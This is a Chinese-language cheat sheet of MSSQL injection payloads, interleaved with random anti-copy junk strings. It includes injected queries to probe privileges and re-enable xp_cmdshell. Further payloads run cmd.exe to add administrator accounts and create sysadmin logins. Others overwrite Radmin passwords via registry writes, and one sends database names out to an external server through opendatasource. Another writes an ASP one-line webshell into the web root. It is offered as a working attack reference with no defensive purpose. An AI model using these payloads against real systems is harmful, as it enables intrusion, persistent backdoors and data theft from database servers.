阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
9 v( J7 K9 b, C! F1 O& S//看看是什么权限的
! V- X. J% N, {5 W/ B/ n* ^and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
  s: Z5 a7 o6 s4 r7 E0 Zand 1= (Select HAS_DBACCESS('master'))
* m6 x  @7 j$ Z8 \; {And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


1 l$ ?, C1 r# z2 X2 B8 D" j+ n$ N数字类型
5 p, T% R6 h! Q. y. ?: ~+ jand char(124)%2Buser%2Bchar(124)=0

字符类型
0 ]0 @4 i2 S" Z: U' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
0 z$ |4 E0 C' o, {6 s1 _' and char(124)%2Buser%2Bchar(124)=0 and '%'='

. g7 u4 C0 |4 U6 k& [% a4 w爆用户名
and user>0
' and user>0 and ''='

( ]1 T9 }/ g6 D- b* J5 n检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
  c  @  o+ i' ]8 I) dAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

3 I$ \6 Y  Q' p( M  N检测是否支持多行
+ ^+ \! @5 p9 `! g% ~% R;declare @d int;--
4 g3 K  J4 W& ^7 Q' I  a+ ?% L0 b
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


- h$ G6 n  k5 X: P- pselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

( o$ n& K+ E5 j/ a6 j( _/ p//-----------------------
+ l5 S7 o) j% c' U% p: H' Y//      执行命令
; E1 Y1 a% \0 j! x/ C, x//-----------------------
首先开启沙盘模式：
- B7 v% W. i- cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
( `7 ~0 r8 F2 i# y! ?
5 F1 S; j* n8 D9 b然后利用jet.oledb执行系统命令
$ U, O$ J1 {; v4 h3 D6 Lselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
: m$ @% O7 h  d: M) [
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
( ]5 Q' D9 z* T7 C! w4 g: A2 N( Z
, W* w& ~/ a$ ~) E判断xp_cmdshell扩展存储过程是否存在：
; |3 n2 {& B; I6 s# Rhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
1 a* Y, ^# y( e* e. p: h
: N0 k4 ]  x7 P- a" `+ _0 aREG_SZ
4 ?2 b) c; ~$ i' L# x" e: D) H
2 d+ x. T6 x- o读注册表
# v2 J, Y$ @! d! _+ x5 ^exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
" V8 ?% C' C! Dexec master..xp_dirtree 'c:\winnt\system32\',1,1
! w4 C- a8 t- w! ?8 j" a  J

数据库备份
backup database pubs to disk = 'c:\123.bak'

6 }- A+ x5 `5 d9 i//爆出长度
$ p$ _$ j, r! d0 R" \1 BAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
6 c7 Y2 ]! f; y3 R: y$ f3 Y
) ?; R% P- Q# Y1 ?1 u% s5 K

更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
" y) ?" }8 f+ \( N. Uexec master.dbo.sp_addlogin test,ptlove
7 M* @. b3 P$ ^5 F% Xexec master.dbo.sp_addsrvrolemember test,sysadmin
( b  @7 j# Y: Y7 w) D, d4 A1 r% h+ y$ o
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
3 _' P2 m& g/ X- E
9 x  y* S- X. P1 a添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
" q$ h- _# U: w9 a1 f+ Y( h% w/ ~
' @! u5 t/ }& h5 t: A) E, n4 H
$ A" P1 q7 [% y2 `1 J& ^& W7 F0 V停掉或激活某个服务。
$ H  e5 |8 \  v+ F
- n& V( P. a" S/ n+ x! iexec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
2 d5 u3 B* E- U& ^% `+ K3 zxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
6 ?  y0 C! G+ p+ M6 ^' R, e所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
# \; _6 r' s) ?5 L
6 ~# g$ T% J; R/ c( d5 Fdbo.xp_makecab
'c:\test.cab','mszip',1,
, F9 e, P$ X5 ^- K'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
# R$ Q# O3 e3 v  H' `
xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

  _1 Y* L9 V9 f2 J( oxp_terminate_process 2484
) `" |+ V" l7 T
* ^+ V) S2 k( C3 Lxp_unpackcab
( w  i: h# p, _( E7 c' o1 v" M5 x
解开压缩档。
' |  @6 g6 w' U/ s, `1 s
xp_unpackcab 'c:\test.cab','c:\temp',1
8 L$ _% X  T7 f2 B: K3 p
% Y) i' }8 E9 f" G  m
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
5 h) A4 D2 v9 V% s" o4 M
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

8 i# D, z& ?4 i1 D. t; x9 F2 [& M//得到数据库名
! N5 m' S4 C- ]insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% \% X( ~/ V9 S1 |( R7 Q5 ^; ^4 V
. s( {* c6 v) G, `0 h: h
//在Master中创建表，看看权限怎样
# |1 n* E$ Y' x0 ]6 gCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- g* Z, J3 G! q7 n$ H5 {
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
9 v& _: l& y' X6 I$ J! {6 N
//更新表内容
! q" @2 v' Q% s' X1 U/ |# |: uUpdate films SET kind = 'Dramatic' Where id = 123
) i) H( v, n$ |& t
//删除内容
' b$ `3 ]# g" @+ _delete from table_name where Stockid = 3